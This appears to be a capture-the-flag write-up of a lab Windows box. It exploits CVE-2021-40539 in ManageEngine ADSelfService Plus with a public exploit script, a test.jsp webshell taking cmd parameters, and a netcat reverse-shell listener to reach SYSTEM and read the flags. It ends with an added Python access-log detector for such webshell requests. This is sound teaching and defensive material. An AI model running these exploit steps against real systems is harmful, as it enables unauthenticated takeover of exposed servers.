ADSelfService
Overview
ADSelfService is a very easy Windows box built around a known pre-auth RCE
in ManageEngine ADSelfService Plus. The self-service portal is reachable on port
80 and is running a version vulnerable to CVE-2021-40539 — a REST API
authentication bypass that chains into arbitrary file write and remote code
execution. Exploitation drops a JSP webshell that runs under
NT AUTHORITY\SYSTEM, so there is no privilege escalation step; both flags are
readable immediately.
Path: ADSelfService Plus portal → CVE-2021-40539 webshell → NT AUTHORITY\SYSTEM → flags.
Enumeration
A port scan reveals a Windows host with a web service on port 80 as the only notable attack surface.
$ nmap -p- 10.129.227.78 -A

Browsing to port 80 reveals a ManageEngine ADSelfService Plus login portal branded with a 2021 ZOHO Corp. copyright.

The version number visible on the page places this in the range affected by CVE-2021-40539.

Foothold — CVE-2021-40539
CVE-2021-40539 is a pre-authentication REST API bypass in ManageEngine ADSelfService Plus that allows an unauthenticated attacker to upload and execute arbitrary JSP files. The exploit from synacktiv/CVE-2021-40539 handles the full chain automatically:
$ git clone https://github.com/synacktiv/CVE-2021-40539.git
$ cd CVE-2021-40539
$ python3 exploit.py -t http://10.129.227.78/
The script confirms the target is vulnerable, writes two webshells, and reports
the process context. The primary webshell (ws.jsp) proved unreliable, but the
verification endpoint the script also places — test.jsp — is accessible and
accepts command parameters:
http://10.129.227.78/help/admin-guide/test.jsp?cmd=whoami
To get a proper reverse shell, a PowerShell payload was URL-encoded and sent
via a POST to test.jsp. A busybox listener caught the connection:
$ sudo busybox nc -lp 443

The shell lands as NT AUTHORITY\SYSTEM with no further escalation needed.
User and Root
Because the process already runs as SYSTEM, both flags are accessible directly from the webshell session:
SHELL> pwd
Path
----
C:\ManageEngine\ADSelfService Plus\bin
SHELL> whoami
nt authority\system
SHELL> type C:\Users\wooden_k\Desktop\user.txt
e6f5f0783e4a06910e2dac666165c4b1
SHELL> type C:\Users\Administrator\Desktop\root.txt
6e9f39e3f5e1e6be7007817e9a116cd3
Takeaways
- CVE-2021-40539 turns an exposed ManageEngine ADSelfService Plus portal into an unauthenticated SYSTEM shell in a single script invocation. Keep self-service portals patched and off public interfaces.
- When the exploit’s primary webshell misbehaves, look for the verification endpoint the script also writes; it often accepts the same parameters and can be repurposed for a reverse shell.
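
On the defensive side, the test.jsp requests shown in the foothold section leave a clear trace in web access logs. The Python detector below is an added example, not part of the original write-up or the Synacktiv tool. It assumes a common-log-style access log and that the /help/ tree should only serve static documentation; the log lines are constructed samples.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in a common-log-style layout (assumption: the
# product's real access-log format may differ and LINE_RE must be adapted).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2024:10:01:02 +0000] "GET /help/admin-guide/index.html HTTP/1.1" 200 5120
192.0.2.10 - - [12/Mar/2024:10:01:09 +0000] "GET /help/admin-guide/test.jsp?cmd=whoami HTTP/1.1" 200 24
192.0.2.10 - - [12/Mar/2024:10:01:30 +0000] "POST /help/admin-guide/test.jsp HTTP/1.1" 200 0
192.0.2.44 - - [12/Mar/2024:10:02:00 +0000] "GET /images/logo.png HTTP/1.1" 200 900
192.0.2.10 - - [12/Mar/2024:10:02:11 +0000] "GET /help/admin-guide/%74est.jsp?x=1&cmd=dir HTTP/1.1" 200 310
192.0.2.77 - - [12/Mar/2024:10:03:00 +0000] "GET /help/admin-guide/missing.jsp HTTP/1.1" 404 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
STATIC_PREFIX = "/help/"   # assumption: documentation tree, static files only
CMD_PARAMS = {"cmd"}       # parameter name used against test.jsp in the write-up


def find_help_jsp_hits(log_text):
    """Return one record per request for a JSP file under the help tree."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # Decode and normalise so %-encoding or ./ segments cannot hide the path.
        path = posixpath.normpath(unquote(url.path)).lower()
        if not (path.startswith(STATIC_PREFIX) and path.endswith(".jsp")):
            continue
        reasons = ["jsp-in-static-tree"]
        if CMD_PARAMS & set(parse_qs(url.query)):
            reasons.append("command-parameter")
        if m["method"] == "POST":
            reasons.append("post-body")
        # A 404 is only a probe; any other status means the server found the file.
        hits.append({"ip": m["ip"], "path": path,
                     "served": m["status"] != "404", "reasons": reasons})
    return hits


def served_shell_paths(hits):
    """Distinct JSP paths the server actually served: files to pull and review."""
    return sorted({h["path"] for h in hits if h["served"]})
```

Any path returned by served_shell_paths is a file to collect from the install directory and compare against a clean installation of the same build.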